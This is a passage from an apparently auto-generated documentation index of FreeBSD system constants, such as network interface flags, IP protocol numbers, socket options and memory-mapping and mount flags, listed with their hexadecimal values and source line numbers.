= 0x80 constant IFF_NOGROUP (line 681) | IFF_NOGROUP = 0x800000 constant IFF_OACTIVE (line 682) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 683) | IFF_POINTOPOINT = 0x10 constant IFF_PPROMISC (line 684) | IFF_PPROMISC = 0x20000 constant IFF_PROMISC (line 685) | IFF_PROMISC = 0x100 constant IFF_RENAMING (line 686) | IFF_RENAMING = 0x400000 constant IFF_RUNNING (line 687) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 688) | IFF_SIMPLEX = 0x800 constant IFF_STATICARP (line 689) | IFF_STATICARP = 0x80000 constant IFF_UP (line 690) | IFF_UP = 0x1 constant IFNAMSIZ (line 691) | IFNAMSIZ = 0x10 constant IFT_BRIDGE (line 692) | IFT_BRIDGE = 0xd1 constant IFT_CARP (line 693) | IFT_CARP = 0xf8 constant IFT_IEEE1394 (line 694) | IFT_IEEE1394 = 0x90 constant IFT_INFINIBAND (line 695) | IFT_INFINIBAND = 0xc7 constant IFT_L2VLAN (line 696) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 697) | IFT_L3IPVLAN = 0x88 constant IFT_PPP (line 698) | IFT_PPP = 0x17 constant IFT_PROPVIRTUAL (line 699) | IFT_PROPVIRTUAL = 0x35 constant IGNBRK (line 700) | IGNBRK = 0x1 constant IGNCR (line 701) | IGNCR = 0x80 constant IGNPAR (line 702) | IGNPAR = 0x4 constant IMAXBEL (line 703) | IMAXBEL = 0x2000 constant INLCR (line 704) | INLCR = 0x40 constant INPCK (line 705) | INPCK = 0x10 constant IN_CLASSA_HOST (line 706) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 707) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 708) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 709) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 710) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 711) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 712) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 713) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 714) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 715) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 716) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 717) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 718) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 719) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 720) | IN_LOOPBACKNET = 0x7f constant IN_RFC3021_MASK (line 721) | IN_RFC3021_MASK = 0xfffffffe constant IPPROTO_3PC (line 722) | IPPROTO_3PC = 0x22 constant IPPROTO_ADFS (line 723) | IPPROTO_ADFS = 0x44 constant IPPROTO_AH (line 724) | IPPROTO_AH = 0x33 constant IPPROTO_AHIP (line 725) | IPPROTO_AHIP = 0x3d constant IPPROTO_APES (line 726) | IPPROTO_APES = 0x63 constant IPPROTO_ARGUS (line 727) | IPPROTO_ARGUS = 0xd constant IPPROTO_AX25 (line 728) | IPPROTO_AX25 = 0x5d constant IPPROTO_BHA (line 729) | IPPROTO_BHA = 0x31 constant IPPROTO_BLT (line 730) | IPPROTO_BLT = 0x1e constant IPPROTO_BRSATMON (line 731) | IPPROTO_BRSATMON = 0x4c constant IPPROTO_CARP (line 732) | IPPROTO_CARP = 0x70 constant IPPROTO_CFTP (line 733) | IPPROTO_CFTP = 0x3e constant IPPROTO_CHAOS (line 734) | IPPROTO_CHAOS = 0x10 constant IPPROTO_CMTP (line 735) | IPPROTO_CMTP = 0x26 constant IPPROTO_CPHB (line 736) | IPPROTO_CPHB = 0x49 constant IPPROTO_CPNX (line 737) | IPPROTO_CPNX = 0x48 constant IPPROTO_DCCP (line 738) | IPPROTO_DCCP = 0x21 constant IPPROTO_DDP (line 739) | IPPROTO_DDP = 0x25 constant IPPROTO_DGP (line 740) | IPPROTO_DGP = 0x56 constant IPPROTO_DIVERT (line 741) | IPPROTO_DIVERT = 0x102 constant IPPROTO_DONE (line 742) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 743) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 744) | IPPROTO_EGP = 0x8 constant IPPROTO_EMCON (line 745) | IPPROTO_EMCON = 0xe constant IPPROTO_ENCAP (line 746) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 747) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 748) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 749) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 750) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 751) | IPPROTO_GGP = 0x3 constant IPPROTO_GMTP (line 752) | IPPROTO_GMTP = 0x64 constant IPPROTO_GRE (line 753) | IPPROTO_GRE = 0x2f constant IPPROTO_HELLO (line 754) | IPPROTO_HELLO = 0x3f constant IPPROTO_HIP (line 755) | IPPROTO_HIP = 0x8b constant IPPROTO_HMP (line 756) | IPPROTO_HMP = 0x14 constant IPPROTO_HOPOPTS (line 757) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 758) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 759) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 760) | IPPROTO_IDP = 0x16 constant IPPROTO_IDPR (line 761) | IPPROTO_IDPR = 0x23 constant IPPROTO_IDRP (line 762) | IPPROTO_IDRP = 0x2d constant IPPROTO_IGMP (line 763) | IPPROTO_IGMP = 0x2 constant IPPROTO_IGP (line 764) | IPPROTO_IGP = 0x55 constant IPPROTO_IGRP (line 765) | IPPROTO_IGRP = 0x58 constant IPPROTO_IL (line 766) | IPPROTO_IL = 0x28 constant IPPROTO_INLSP (line 767) | IPPROTO_INLSP = 0x34 constant IPPROTO_INP (line 768) | IPPROTO_INP = 0x20 constant IPPROTO_IP (line 769) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 770) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPCV (line 771) | IPPROTO_IPCV = 0x47 constant IPPROTO_IPEIP (line 772) | IPPROTO_IPEIP = 0x5e constant IPPROTO_IPIP (line 773) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPPC (line 774) | IPPROTO_IPPC = 0x43 constant IPPROTO_IPV4 (line 775) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 776) | IPPROTO_IPV6 = 0x29 constant IPPROTO_IRTP (line 777) | IPPROTO_IRTP = 0x1c constant IPPROTO_KRYPTOLAN (line 778) | IPPROTO_KRYPTOLAN = 0x41 constant IPPROTO_LARP (line 779) | IPPROTO_LARP = 0x5b constant IPPROTO_LEAF1 (line 780) | IPPROTO_LEAF1 = 0x19 constant IPPROTO_LEAF2 (line 781) | IPPROTO_LEAF2 = 0x1a constant IPPROTO_MAX (line 782) | IPPROTO_MAX = 0x100 constant IPPROTO_MEAS (line 783) | IPPROTO_MEAS = 0x13 constant IPPROTO_MH (line 784) | IPPROTO_MH = 0x87 constant IPPROTO_MHRP (line 785) | IPPROTO_MHRP = 0x30 constant IPPROTO_MICP (line 786) | IPPROTO_MICP = 0x5f constant IPPROTO_MOBILE (line 787) | IPPROTO_MOBILE = 0x37 constant IPPROTO_MPLS (line 788) | IPPROTO_MPLS = 0x89 constant IPPROTO_MTP (line 789) | IPPROTO_MTP = 0x5c constant IPPROTO_MUX (line 790) | IPPROTO_MUX = 0x12 constant IPPROTO_ND (line 791) | IPPROTO_ND = 0x4d constant IPPROTO_NHRP (line 792) | IPPROTO_NHRP = 0x36 constant IPPROTO_NONE (line 793) | IPPROTO_NONE = 0x3b constant IPPROTO_NSP (line 794) | IPPROTO_NSP = 0x1f constant IPPROTO_NVPII (line 795) | IPPROTO_NVPII = 0xb constant IPPROTO_OLD_DIVERT (line 796) | IPPROTO_OLD_DIVERT = 0xfe constant IPPROTO_OSPFIGP (line 797) | IPPROTO_OSPFIGP = 0x59 constant IPPROTO_PFSYNC (line 798) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PGM (line 799) | IPPROTO_PGM = 0x71 constant IPPROTO_PIGP (line 800) | IPPROTO_PIGP = 0x9 constant IPPROTO_PIM (line 801) | IPPROTO_PIM = 0x67 constant IPPROTO_PRM (line 802) | IPPROTO_PRM = 0x15 constant IPPROTO_PUP (line 803) | IPPROTO_PUP = 0xc constant IPPROTO_PVP (line 804) | IPPROTO_PVP = 0x4b constant IPPROTO_RAW (line 805) | IPPROTO_RAW = 0xff constant IPPROTO_RCCMON (line 806) | IPPROTO_RCCMON = 0xa constant IPPROTO_RDP (line 807) | IPPROTO_RDP = 0x1b constant IPPROTO_RESERVED_253 (line 808) | IPPROTO_RESERVED_253 = 0xfd constant IPPROTO_RESERVED_254 (line 809) | IPPROTO_RESERVED_254 = 0xfe constant IPPROTO_ROUTING (line 810) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 811) | IPPROTO_RSVP = 0x2e constant IPPROTO_RVD (line 812) | IPPROTO_RVD = 0x42 constant IPPROTO_SATEXPAK (line 813) | IPPROTO_SATEXPAK = 0x40 constant IPPROTO_SATMON (line 814) | IPPROTO_SATMON = 0x45 constant IPPROTO_SCCSP (line 815) | IPPROTO_SCCSP = 0x60 constant IPPROTO_SCTP (line 816) | IPPROTO_SCTP = 0x84 constant IPPROTO_SDRP (line 817) | IPPROTO_SDRP = 0x2a constant IPPROTO_SEND (line 818) | IPPROTO_SEND = 0x103 constant IPPROTO_SHIM6 (line 819) | IPPROTO_SHIM6 = 0x8c constant IPPROTO_SKIP (line 820) | IPPROTO_SKIP = 0x39 constant IPPROTO_SPACER (line 821) | IPPROTO_SPACER = 0x7fff constant IPPROTO_SRPC (line 822) | IPPROTO_SRPC = 0x5a constant IPPROTO_ST (line 823) | IPPROTO_ST = 0x7 constant IPPROTO_SVMTP (line 824) | IPPROTO_SVMTP = 0x52 constant IPPROTO_SWIPE (line 825) | IPPROTO_SWIPE = 0x35 constant IPPROTO_TCF (line 826) | IPPROTO_TCF = 0x57 constant IPPROTO_TCP (line 827) | IPPROTO_TCP = 0x6 constant IPPROTO_TLSP (line 828) | IPPROTO_TLSP = 0x38 constant IPPROTO_TP (line 829) | IPPROTO_TP = 0x1d constant IPPROTO_TPXX (line 830) | IPPROTO_TPXX = 0x27 constant IPPROTO_TRUNK1 (line 831) | IPPROTO_TRUNK1 = 0x17 constant IPPROTO_TRUNK2 (line 832) | IPPROTO_TRUNK2 = 0x18 constant IPPROTO_TTP (line 833) | IPPROTO_TTP = 0x54 constant IPPROTO_UDP (line 834) | IPPROTO_UDP = 0x11 constant IPPROTO_UDPLITE (line 835) | IPPROTO_UDPLITE = 0x88 constant IPPROTO_VINES (line 836) | IPPROTO_VINES = 0x53 constant IPPROTO_VISA (line 837) | IPPROTO_VISA = 0x46 constant IPPROTO_VMTP (line 838) | IPPROTO_VMTP = 0x51 constant IPPROTO_WBEXPAK (line 839) | IPPROTO_WBEXPAK = 0x4f constant IPPROTO_WBMON (line 840) | IPPROTO_WBMON = 0x4e constant IPPROTO_WSN (line 841) | IPPROTO_WSN = 0x4a constant IPPROTO_XNET (line 842) | IPPROTO_XNET = 0xf constant IPPROTO_XTP (line 843) | IPPROTO_XTP = 0x24 constant IPV6_AUTOFLOWLABEL (line 844) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_BINDANY (line 845) | IPV6_BINDANY = 0x40 constant IPV6_BINDMULTI (line 846) | IPV6_BINDMULTI = 0x41 constant IPV6_BINDV6ONLY (line 847) | IPV6_BINDV6ONLY = 0x1b constant IPV6_CHECKSUM (line 848) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 849) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 850) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 851) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 852) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 853) | IPV6_DSTOPTS = 0x32 constant IPV6_FLOWID (line 854) | IPV6_FLOWID = 0x43 constant IPV6_FLOWINFO_MASK (line 855) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_LEN (line 856) | IPV6_FLOWLABEL_LEN = 0x14 constant IPV6_FLOWLABEL_MASK (line 857) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FLOWTYPE (line 858) | IPV6_FLOWTYPE = 0x44 constant IPV6_FRAGTTL (line 859) | IPV6_FRAGTTL = 0x78 constant IPV6_FW_ADD (line 860) | IPV6_FW_ADD = 0x1e constant IPV6_FW_DEL (line 861) | IPV6_FW_DEL = 0x1f constant IPV6_FW_FLUSH (line 862) | IPV6_FW_FLUSH = 0x20 constant IPV6_FW_GET (line 863) | IPV6_FW_GET = 0x22 constant IPV6_FW_ZERO (line 864) | IPV6_FW_ZERO = 0x21 constant IPV6_HLIMDEC (line 865) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 866) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 867) | IPV6_HOPOPTS = 0x31 constant IPV6_IPSEC_POLICY (line 868) | IPV6_IPSEC_POLICY = 0x1c constant IPV6_JOIN_GROUP (line 869) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 870) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 871) | IPV6_MAXHLIM = 0xff constant IPV6_MAXOPTHDR (line 872) | IPV6_MAXOPTHDR = 0x800 constant IPV6_MAXPACKET (line 873) | IPV6_MAXPACKET = 0xffff constant IPV6_MAX_GROUP_SRC_FILTER (line 874) | IPV6_MAX_GROUP_SRC_FILTER = 0x200 constant IPV6_MAX_MEMBERSHIPS (line 875) | IPV6_MAX_MEMBERSHIPS = 0xfff constant IPV6_MAX_SOCK_SRC_FILTER (line 876) | IPV6_MAX_SOCK_SRC_FILTER = 0x80 constant IPV6_MMTU (line 877) | IPV6_MMTU = 0x500 constant IPV6_MSFILTER (line 878) | IPV6_MSFILTER = 0x4a constant IPV6_MULTICAST_HOPS (line 879) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 880) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 881) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 882) | IPV6_NEXTHOP = 0x30 constant IPV6_ORIGDSTADDR (line 883) | IPV6_ORIGDSTADDR = 0x48 constant IPV6_PATHMTU (line 884) | IPV6_PATHMTU = 0x2c constant IPV6_PKTINFO (line 885) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 886) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 887) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 888) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 889) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_PREFER_TEMPADDR (line 890) | IPV6_PREFER_TEMPADDR = 0x3f constant IPV6_RECVDSTOPTS (line 891) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVFLOWID (line 892) | IPV6_RECVFLOWID = 0x46 constant IPV6_RECVHOPLIMIT (line 893) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 894) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVORIGDSTADDR (line 895) | IPV6_RECVORIGDSTADDR = 0x48 constant IPV6_RECVPATHMTU (line 896) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 897) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRSSBUCKETID (line 898) | IPV6_RECVRSSBUCKETID = 0x47 constant IPV6_RECVRTHDR (line 899) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 900) | IPV6_RECVTCLASS = 0x39 constant IPV6_RSSBUCKETID (line 901) | IPV6_RSSBUCKETID = 0x45 constant IPV6_RSS_LISTEN_BUCKET (line 902) | IPV6_RSS_LISTEN_BUCKET = 0x42 constant IPV6_RTHDR (line 903) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 904) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 905) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 906) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 907) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 908) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 909) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 910) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 911) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 912) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 913) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 914) | IPV6_VERSION_MASK = 0xf0 constant IPV6_VLAN_PCP (line 915) | IPV6_VLAN_PCP = 0x4b constant IP_ADD_MEMBERSHIP (line 916) | IP_ADD_MEMBERSHIP = 0xc constant IP_ADD_SOURCE_MEMBERSHIP (line 917) | IP_ADD_SOURCE_MEMBERSHIP = 0x46 constant IP_BINDANY (line 918) | IP_BINDANY = 0x18 constant IP_BINDMULTI (line 919) | IP_BINDMULTI = 0x19 constant IP_BLOCK_SOURCE (line 920) | IP_BLOCK_SOURCE = 0x48 constant IP_DEFAULT_MULTICAST_LOOP (line 921) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 922) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 923) | IP_DF = 0x4000 constant IP_DONTFRAG (line 924) | IP_DONTFRAG = 0x43 constant IP_DROP_MEMBERSHIP (line 925) | IP_DROP_MEMBERSHIP = 0xd constant IP_DROP_SOURCE_MEMBERSHIP (line 926) | IP_DROP_SOURCE_MEMBERSHIP = 0x47 constant IP_DUMMYNET3 (line 927) | IP_DUMMYNET3 = 0x31 constant IP_DUMMYNET_CONFIGURE (line 928) | IP_DUMMYNET_CONFIGURE = 0x3c constant IP_DUMMYNET_DEL (line 929) | IP_DUMMYNET_DEL = 0x3d constant IP_DUMMYNET_FLUSH (line 930) | IP_DUMMYNET_FLUSH = 0x3e constant IP_DUMMYNET_GET (line 931) | IP_DUMMYNET_GET = 0x40 constant IP_FLOWID (line 932) | IP_FLOWID = 0x5a constant IP_FLOWTYPE (line 933) | IP_FLOWTYPE = 0x5b constant IP_FW3 (line 934) | IP_FW3 = 0x30 constant IP_FW_ADD (line 935) | IP_FW_ADD = 0x32 constant IP_FW_DEL (line 936) | IP_FW_DEL = 0x33 constant IP_FW_FLUSH (line 937) | IP_FW_FLUSH = 0x34 constant IP_FW_GET (line 938) | IP_FW_GET = 0x36 constant IP_FW_NAT_CFG (line 939) | IP_FW_NAT_CFG = 0x38 constant IP_FW_NAT_DEL (line 940) | IP_FW_NAT_DEL = 0x39 constant IP_FW_NAT_GET_CONFIG (line 941) | IP_FW_NAT_GET_CONFIG = 0x3a constant IP_FW_NAT_GET_LOG (line 942) | IP_FW_NAT_GET_LOG = 0x3b constant IP_FW_RESETLOG (line 943) | IP_FW_RESETLOG = 0x37 constant IP_FW_TABLE_ADD (line 944) | IP_FW_TABLE_ADD = 0x28 constant IP_FW_TABLE_DEL (line 945) | IP_FW_TABLE_DEL = 0x29 constant IP_FW_TABLE_FLUSH (line 946) | IP_FW_TABLE_FLUSH = 0x2a constant IP_FW_TABLE_GETSIZE (line 947) | IP_FW_TABLE_GETSIZE = 0x2b constant IP_FW_TABLE_LIST (line 948) | IP_FW_TABLE_LIST = 0x2c constant IP_FW_ZERO (line 949) | IP_FW_ZERO = 0x35 constant IP_HDRINCL (line 950) | IP_HDRINCL = 0x2 constant IP_IPSEC_POLICY (line 951) | IP_IPSEC_POLICY = 0x15 constant IP_MAXPACKET (line 952) | IP_MAXPACKET = 0xffff constant IP_MAX_GROUP_SRC_FILTER (line 953) | IP_MAX_GROUP_SRC_FILTER = 0x200 constant IP_MAX_MEMBERSHIPS (line 954) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MAX_SOCK_MUTE_FILTER (line 955) | IP_MAX_SOCK_MUTE_FILTER = 0x80 constant IP_MAX_SOCK_SRC_FILTER (line 956) | IP_MAX_SOCK_SRC_FILTER = 0x80 constant IP_MF (line 957) | IP_MF = 0x2000 constant IP_MINTTL (line 958) | IP_MINTTL = 0x42 constant IP_MSFILTER (line 959) | IP_MSFILTER = 0x4a constant IP_MSS (line 960) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 961) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 962) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 963) | IP_MULTICAST_TTL = 0xa constant IP_MULTICAST_VIF (line 964) | IP_MULTICAST_VIF = 0xe constant IP_OFFMASK (line 965) | IP_OFFMASK = 0x1fff constant IP_ONESBCAST (line 966) | IP_ONESBCAST = 0x17 constant IP_OPTIONS (line 967) | IP_OPTIONS = 0x1 constant IP_ORIGDSTADDR (line 968) | IP_ORIGDSTADDR = 0x1b constant IP_PORTRANGE (line 969) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 970) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 971) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 972) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 973) | IP_RECVDSTADDR = 0x7 constant IP_RECVFLOWID (line 974) | IP_RECVFLOWID = 0x5d constant IP_RECVIF (line 975) | IP_RECVIF = 0x14 constant IP_RECVOPTS (line 976) | IP_RECVOPTS = 0x5 constant IP_RECVORIGDSTADDR (line 977) | IP_RECVORIGDSTADDR = 0x1b constant IP_RECVRETOPTS (line 978) | IP_RECVRETOPTS = 0x6 constant IP_RECVRSSBUCKETID (line 979) | IP_RECVRSSBUCKETID = 0x5e constant IP_RECVTOS (line 980) | IP_RECVTOS = 0x44 constant IP_RECVTTL (line 981) | IP_RECVTTL = 0x41 constant IP_RETOPTS (line 982) | IP_RETOPTS = 0x8 constant IP_RF (line 983) | IP_RF = 0x8000 constant IP_RSSBUCKETID (line 984) | IP_RSSBUCKETID = 0x5c constant IP_RSS_LISTEN_BUCKET (line 985) | IP_RSS_LISTEN_BUCKET = 0x1a constant IP_RSVP_OFF (line 986) | IP_RSVP_OFF = 0x10 constant IP_RSVP_ON (line 987) | IP_RSVP_ON = 0xf constant IP_RSVP_VIF_OFF (line 988) | IP_RSVP_VIF_OFF = 0x12 constant IP_RSVP_VIF_ON (line 989) | IP_RSVP_VIF_ON = 0x11 constant IP_SENDSRCADDR (line 990) | IP_SENDSRCADDR = 0x7 constant IP_TOS (line 991) | IP_TOS = 0x3 constant IP_TTL (line 992) | IP_TTL = 0x4 constant IP_UNBLOCK_SOURCE (line 993) | IP_UNBLOCK_SOURCE = 0x49 constant IP_VLAN_PCP (line 994) | IP_VLAN_PCP = 0x4b constant ISIG (line 995) | ISIG = 0x80 constant ISTRIP (line 996) | ISTRIP = 0x20 constant ITIMER_PROF (line 997) | ITIMER_PROF = 0x2 constant ITIMER_REAL (line 998) | ITIMER_REAL = 0x0 constant ITIMER_VIRTUAL (line 999) | ITIMER_VIRTUAL = 0x1 constant IXANY (line 1000) | IXANY = 0x800 constant IXOFF (line 1001) | IXOFF = 0x400 constant IXON (line 1002) | IXON = 0x200 constant KERN_HOSTNAME (line 1003) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 1004) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 1005) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 1006) | KERN_VERSION = 0x4 constant LOCAL_CONNWAIT (line 1007) | LOCAL_CONNWAIT = 0x4 constant LOCAL_CREDS (line 1008) | LOCAL_CREDS = 0x2 constant LOCAL_PEERCRED (line 1009) | LOCAL_PEERCRED = 0x1 constant LOCAL_VENDOR (line 1010) | LOCAL_VENDOR = 0x80000000 constant LOCK_EX (line 1011) | LOCK_EX = 0x2 constant LOCK_NB (line 1012) | LOCK_NB = 0x4 constant LOCK_SH (line 1013) | LOCK_SH = 0x1 constant LOCK_UN (line 1014) | LOCK_UN = 0x8 constant MADV_AUTOSYNC (line 1015) | MADV_AUTOSYNC = 0x7 constant MADV_CORE (line 1016) | MADV_CORE = 0x9 constant MADV_DONTNEED (line 1017) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 1018) | MADV_FREE = 0x5 constant MADV_NOCORE (line 1019) | MADV_NOCORE = 0x8 constant MADV_NORMAL (line 1020) | MADV_NORMAL = 0x0 constant MADV_NOSYNC (line 1021) | MADV_NOSYNC = 0x6 constant MADV_PROTECT (line 1022) | MADV_PROTECT = 0xa constant MADV_RANDOM (line 1023) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 1024) | MADV_SEQUENTIAL = 0x2 constant MADV_WILLNEED (line 1025) | MADV_WILLNEED = 0x3 constant MAP_ALIGNED_SUPER (line 1026) | MAP_ALIGNED_SUPER = 0x1000000 constant MAP_ALIGNMENT_MASK (line 1027) | MAP_ALIGNMENT_MASK = -0x1000000 constant MAP_ALIGNMENT_SHIFT (line 1028) | MAP_ALIGNMENT_SHIFT = 0x18 constant MAP_ANON (line 1029) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 1030) | MAP_ANONYMOUS = 0x1000 constant MAP_COPY (line 1031) | MAP_COPY = 0x2 constant MAP_EXCL (line 1032) | MAP_EXCL = 0x4000 constant MAP_FILE (line 1033) | MAP_FILE = 0x0 constant MAP_FIXED (line 1034) | MAP_FIXED = 0x10 constant MAP_GUARD (line 1035) | MAP_GUARD = 0x2000 constant MAP_HASSEMAPHORE (line 1036) | MAP_HASSEMAPHORE = 0x200 constant MAP_NOCORE (line 1037) | MAP_NOCORE = 0x20000 constant MAP_NOSYNC (line 1038) | MAP_NOSYNC = 0x800 constant MAP_PREFAULT_READ (line 1039) | MAP_PREFAULT_READ = 0x40000 constant MAP_PRIVATE (line 1040) | MAP_PRIVATE = 0x2 constant MAP_RESERVED0020 (line 1041) | MAP_RESERVED0020 = 0x20 constant MAP_RESERVED0040 (line 1042) | MAP_RESERVED0040 = 0x40 constant MAP_RESERVED0080 (line 1043) | MAP_RESERVED0080 = 0x80 constant MAP_RESERVED0100 (line 1044) | MAP_RESERVED0100 = 0x100 constant MAP_SHARED (line 1045) | MAP_SHARED = 0x1 constant MAP_STACK (line 1046) | MAP_STACK = 0x400 constant MCAST_BLOCK_SOURCE (line 1047) | MCAST_BLOCK_SOURCE = 0x54 constant MCAST_EXCLUDE (line 1048) | MCAST_EXCLUDE = 0x2 constant MCAST_INCLUDE (line 1049) | MCAST_INCLUDE = 0x1 constant MCAST_JOIN_GROUP (line 1050) | MCAST_JOIN_GROUP = 0x50 constant MCAST_JOIN_SOURCE_GROUP (line 1051) | MCAST_JOIN_SOURCE_GROUP = 0x52 constant MCAST_LEAVE_GROUP (line 1052) | MCAST_LEAVE_GROUP = 0x51 constant MCAST_LEAVE_SOURCE_GROUP (line 1053) | MCAST_LEAVE_SOURCE_GROUP = 0x53 constant MCAST_UNBLOCK_SOURCE (line 1054) | MCAST_UNBLOCK_SOURCE = 0x55 constant MCAST_UNDEFINED (line 1055) | MCAST_UNDEFINED = 0x0 constant MCL_CURRENT (line 1056) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1057) | MCL_FUTURE = 0x2 constant MNT_ACLS (line 1058) | MNT_ACLS = 0x8000000 constant MNT_ASYNC (line 1059) | MNT_ASYNC = 0x40 constant MNT_AUTOMOUNTED (line 1060) | MNT_AUTOMOUNTED = 0x200000000 constant MNT_BYFSID (line 1061) | MNT_BYFSID = 0x8000000 constant MNT_CMDFLAGS (line 1062) | MNT_CMDFLAGS = 0xd0f0000 constant MNT_DEFEXPORTED (line 1063) | MNT_DEFEXPORTED = 0x200 constant MNT_DELEXPORT (line 1064) | MNT_DELEXPORT = 0x20000 constant MNT_EXKERB (line 1065) | MNT_EXKERB = 0x800 constant MNT_EXPORTANON (line 1066) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1067) | MNT_EXPORTED = 0x100 constant MNT_EXPUBLIC (line 1068) | MNT_EXPUBLIC = 0x20000000 constant MNT_EXRDONLY (line 1069) | MNT_EXRDONLY = 0x80 constant MNT_FORCE (line 1070) | MNT_FORCE = 0x80000 constant MNT_GJOURNAL (line 1071) | MNT_GJOURNAL = 0x2000000 constant MNT_IGNORE (line 1072) | MNT_IGNORE = 0x800000 constant MNT_LAZY (line 1073) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1074) | MNT_LOCAL = 0x1000 constant MNT_MULTILABEL (line 1075) | MNT_MULTILABEL = 0x4000000 constant MNT_NFS4ACLS (line 1076) | MNT_NFS4ACLS = 0x10 constant MNT_NOATIME (line 1077) | MNT_NOATIME = 